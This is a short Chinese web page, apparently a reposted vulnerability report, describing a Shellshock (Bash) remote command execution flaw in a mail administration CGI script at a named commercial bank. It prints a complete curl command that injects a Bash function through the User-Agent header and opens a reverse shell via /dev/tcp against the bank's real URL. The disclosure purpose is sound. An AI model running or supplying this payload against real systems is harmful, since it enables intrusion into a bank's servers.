作品发布     邀请码    设为首页  收藏 

当前位置:文章漏洞 → 文章内容 >> 某地区商业银行某系统BASH远程命令执行漏洞


某地区商业银行某系统BASH远程命令执行漏洞

更新时间:2014-11-15 16:56:28   作者:佚名  来源:不详

上海银行:

http://mail.bankofshanghai.com/cgi-bin/madmin.cgi



code 区域
curl  -A "() { :; }; /bin/bash -i > /dev/tcp/127.0.0.1/2345 0<&1 2>&1" http://mail.bankofshanghai.com/cgi-bin/madmin.cgi -v

漏洞证明:

屏幕快照 2014-09-27 下午9.49.54.png

修复方案:

打补丁呗

责任编辑:华中帝国        



本文引用网址: 

某地区商业银行某系统BASH远程命令执行漏洞的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码